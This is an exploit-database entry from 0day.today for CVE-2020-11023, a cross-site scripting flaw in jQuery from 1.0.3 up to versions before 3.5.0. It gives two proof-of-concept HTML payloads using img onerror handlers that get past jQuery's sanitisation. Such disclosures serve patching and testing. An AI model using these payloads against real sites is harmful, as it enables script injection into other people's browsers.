Lucene search

K
zdtZdt1337DAY-ID-36103
HistoryApr 14, 2021 - 12:00 a.m.

jQuery 1.0.3 - Cross-Site Scripting Vulnerability

2021-04-1400:00:00
0day.today
3392

0.019 Low

EPSS

Percentile

88.6%

# Exploit Title: jQuery 1.0.3 - Cross-Site Scripting (XSS)
# Exploit Author: Central InfoSec
# Version: jQuery versions greater than or equal to 1.0.3 and before 3.5.0
# CVE : CVE-2020-11023

# Proof of Concept 1:
<style><style /><img src=x onerror=alert(1)>

# Proof of Concept 2 (Only jQuery 3.x affected):
<img alt="<x" title="/><img src=x onerror=alert(1)>">

#  0day.today [2021-10-19]  #